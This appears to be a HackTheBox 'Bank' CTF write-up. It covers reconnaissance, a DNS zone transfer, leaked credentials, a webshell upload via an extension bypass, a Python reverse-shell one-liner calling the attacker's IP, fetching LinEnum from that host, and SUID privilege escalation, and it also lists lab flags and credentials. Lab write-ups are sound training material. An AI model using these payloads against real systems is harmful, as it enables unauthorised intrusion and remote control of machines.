This is an easy linux box
Tools used
- cat
- dig
- ffuf
- grep
- head
- linenum
- mv
- nc
- nmap
- python
- vim
- wget
Reconnaissance
Nmap
nmap -sC -sV -oA bank 10.10.10.29 -v
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 1024 08:ee:d0:30:d5:45:e4:59:db:4d:54:a8:dc:5c:ef:15 (DSA)
| 2048 b8:e0:15:48:2d:0d:f0:f1:73:33:b7:81:64:08:4a:91 (RSA)
| 256 a0:4c:94:d1:7b:6e:a8:fd:07:fe:11:eb:88:d5:16:65 (ECDSA)
|_ 256 2d:79:44:30:c8:bb:5e:8f:07:cf:5b:72:ef:a1:6d:67 (ED25519)
53/tcp open domain ISC BIND 9.9.5-3ubuntu0.14 (Ubuntu Linux)
| dns-nsid:
|_ bind.version: 9.9.5-3ubuntu0.14-Ubuntu
80/tcp open http Apache httpd 2.4.7 ((Ubuntu))
| http-methods:
|_ Supported Methods: POST OPTIONS GET HEAD
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Here’s what nmap teaches us :
- port 22 (SSH) - OpenSSH 6.6.1p1
- port 53 - ISC BIND 9.9.5
- port 80 (HTTP) - Apache 2.4.7
Port 53 (DNS) is open, which is a bit weird, but first see go to the web port.
This is a default apache web page. Let’s try to found files/directory :
ffuf -w /home/liodeus/directory-list-lowercase-2.3-medium.txt -u http://10.10.10.29/FUZZ -e .html,.txt,.php -t 100
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v1.1.0-git
________________________________________________
:: Method : GET
:: URL : http://10.10.10.29/FUZZ
:: Wordlist : FUZZ: /home/liodeus/directory-list-lowercase-2.3-medium.txt
:: Extensions : .html .txt .php
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 100
:: Matcher : Response status: 200,204,301,302,307,401,403
________________________________________________
index.html [Status: 200, Size: 11510, Words: 3526, Lines: 379]
server-status [Status: 403, Size: 291, Words: 21, Lines: 11]
Nothing interesting here ! Go back to the DNS port. I’ll try for a zone transfert. But for that, I need a “name server”, the default name server for all HackTheBox machines is “name of box”.htb. I didn’t found another way to get it apart from taking a guess ! Guessing the name server, and knowing that port 53 (DNS) is open, I tried a zone transfert :
dig axfr @10.10.10.29 bank.htb
; <<>> DiG 9.16.4-Debian <<>> axfr @10.10.10.29 bank.htb
; (1 server found)
;; global options: +cmd
bank.htb. 604800 IN SOA bank.htb. chris.bank.htb. 2 604800 86400 2419200 604800
bank.htb. 604800 IN NS ns.bank.htb.
bank.htb. 604800 IN A 10.10.10.29
ns.bank.htb. 604800 IN A 10.10.10.29
www.bank.htb. 604800 IN CNAME bank.htb.
bank.htb. 604800 IN SOA bank.htb. chris.bank.htb. 2 604800 86400 2419200 604800
;; Query time: 88 msec
;; SERVER: 10.10.10.29#53(10.10.10.29)
;; WHEN: Mon Jul 27 11:18:16 CEST 2020
;; XFR size: 6 records (messages 1, bytes 171)
And it works, I now have more domains, that I added to my hosts file like so :
sudo vim /etc/hosts
10.10.10.29 bank.htb chris.bank.htb ns.bank.htb
I tried to connect to each new domain :
- bank.htb - Different
- chris.bank.htb - Same as 10.10.10.29
- ns.bank.htb - Same as 10.10.10.29
Since there is a login page, I tried default credentials :
- admin:admin
- admin:password
- admin:root
- admin:bank
- administrator:administrator
- administrator:bank
It didn’t work ! Let’s try again to found files/directories with ffuf :
ffuf -w /home/liodeus/directory-list-lowercase-2.3-medium.txt -u http://bank.htb/FUZZ -e .php~.txt,.php -t 250
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v1.1.0-git
________________________________________________
:: Method : GET
:: URL : http://bank.htb/FUZZ
:: Wordlist : FUZZ: /home/liodeus/directory-list-lowercase-2.3-medium.txt
:: Extensions : .php~.txt .php
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 250
:: Matcher : Response status: 200,204,301,302,307,401,403
________________________________________________
index.php [Status: 302, Size: 7322, Words: 3793, Lines: 189]
login.php [Status: 200, Size: 1974, Words: 595, Lines: 52]
uploads [Status: 301, Size: 305, Words: 20, Lines: 10]
assets [Status: 301, Size: 304, Words: 20, Lines: 10]
logout.php [Status: 302, Size: 0, Words: 1, Lines: 1]
support.php [Status: 302, Size: 3291, Words: 784, Lines: 84]
inc [Status: 301, Size: 301, Words: 20, Lines: 10]
.php [Status: 403, Size: 279, Words: 21, Lines: 11]
server-status [Status: 403, Size: 288, Words: 21, Lines: 11]
balance-transfer [Status: 301, Size: 314, Words: 20, Lines: 10]
Ffuf found an interesting directory : balance-transfer
This directory contains a LOT of balance transfer, who looks like that :
The data contained in thoose files are encrypted ! But what if there is one that is not, I might be able to get credentials. To check for that, I recursively download all of the transfer files :
wget -r http://bank.htb/balance-transfer/
Then I display only the first line of each files and remove “++OK” to see if at least a file didn’t succeed encryption :
head -n 1 * -q | grep -v "++OK"
--ERR ENCRYPT FAILED
So there is a file that contains data which aren’t encrypt, let’s found this file :
grep -Ri "ENCRYPT FAILED"
68576f20e9732f1b2edc4df5b8533230.acc:--ERR ENCRYPT FAILED
I now have credentials :
Email: chris@bank.htb
Password: !##HTBB4nkP4ssw0rd!##
Let’s go again to the login page and use thoose credentials :
I’m connected, nice ! Looking at what I have, I see the support page which is interesting, because I can upload things, naturaly I tried to upload a webshell :
wget https://raw.githubusercontent.com/flozz/p0wny-shell/master/shell.php
Only images are accepted !
I tried different bypass methods that you can found here : https://sushant747.gitbooks.io/total-oscp-guide/content/bypass_image_upload.html. It didn’t works, so I had to do something else. Looking at the source code of the page give me what I needed :
<!-- [DEBUG] I added the file extension .htb to execute as php for debugging purposes only [DEBUG] -->
Exploit
Rename the shell with the .htb extension :
mv shell.php shell.htb
Then upload it :
Clicked on the attachment and I’m redirected to my webshell !
I prefer get a reverse shell on my machine, start a nc listener :
nc -lvp 1234
On the webshell :
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.10",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
TTY shell on my machine :
python -c "import pty;pty.spawn('/bin/bash')"
CTRL+Z
stty raw -echo
fg
Now let’s do some enumeration thanks to LinEnum.sh :
python -m SimpleHTTPServer
Upload it to the server :
wget http://10.10.14.10:8000/LinEnum.sh
Launch it :
bash LinEnum.sh | tee results.txt
Looking through the results multiple times, I notice this line which stands out :
[-] SUID files:
-rwsr-xr-x 1 root root 112204 Jun 14 2017 /var/htb/bin/emergency
So I tried to use it :
www-data@bank:/tmp$ /var/htb/bin/emergency
# whoami
root
And there I was root ! Now let’s read the flags.
Flags
User.txt
# cat /home/chris/user.txt
37c97f8609f361848d8872098b0721c3
Root.txt
# cat /root/root.txt
d5be56adc67b488f81a4b9de30c8a68e